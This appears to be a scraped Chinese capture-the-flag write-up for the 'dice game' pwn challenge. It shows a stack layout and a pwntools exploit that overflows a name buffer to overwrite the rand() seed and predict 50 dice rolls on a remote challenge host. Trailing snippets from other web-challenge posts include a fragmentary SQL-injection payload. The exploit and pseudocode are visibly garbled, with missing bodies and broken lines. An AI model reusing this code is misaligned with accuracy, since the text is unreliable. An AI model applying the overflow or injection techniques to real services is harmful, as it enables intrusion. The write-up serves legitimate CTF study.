攻防世界 高階區 dice game

2022-07-24 19:36:14 字數 1361 閱讀 1166

進過一小段時間的沉澱,發現自己是個小垃圾以外並沒有什麼收穫,還是繼續看看題過養老生活吧

題目鏈結

先檢查程式:沒有發現canary,有可能可以實現棧溢位操作

arch:     amd64-64-little

relro: full relro

stack: no canary found

nx: nx enabled

pie: pie enabled

放進ida進行靜態分析:emmm,和新手區的guess_number非常相似,這題

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

++v8;

} puts(

"bye bye!");

return

0ll;

}

sub_a20():

signed __int64 sub_a20()

else

} else

return

result;

}

想要乙隻連續猜中50次,首先需要控制它的seed,這裡可以通過輸入名字時通過buf覆蓋seed

-0000000000000050 buf             db 55 dup(?)

-0000000000000019 var_19 db ?

-0000000000000018 var_18 dq ?

-0000000000000010 seed dd 2 dup(?)

控制了seed後再根據他提供的libc來生成隨機數,這道題和guess_number基本一致,有不清楚的可以看我之前的那篇.

參考exp:

from pwn import *

from ctypes import *io = remote("

220.249.52.133

",54506

)libc = cdll.loadlibrary("

libc.so.6")

io.recv()

payload = 0x40*"

a" + p64(0

)io.sendline(payload)

a =for i in range(50):)

print(a)

for i in

a: io.recv()

print(io.recv())

io.sendline(str(i))

io.interactive()

攻防世界 web(高階區)

瞅瞅高階區的,繼續總結。var t fl s a i e var n a h0l n var r g 得到flag 開啟場景鏈結 你可以瀏覽這個 嗎?no,i can t.檢視原始碼什麼都沒有,後面加上index.php。沒用,加上index.phps phps檔案就是php的源 檔案,通常用於提供...

攻防世界web高階區unfinish

有登入就可能有註冊,url欄register.php 先註冊乙個 註冊成功後跳轉到主頁,同時在主頁顯示使用者名稱 唔,鬼刀裡的冰公主,品味不錯,俺喜歡 先試著在註冊介面手注吧 構造插入的註冊語句 payload insert into tables values ema il 0 asci i su...

攻防世界web高階區warmup詳解

檢視原始碼發現source.php 我們直接訪問 發現hint.php 我們再訪問 flag not here,and flag in ffffllllaaaagggg 這裡提示我們flag在ffffllllaaaagggg裡面 那麼我們去看看source.php 直接定義了乙個類,他將file的值...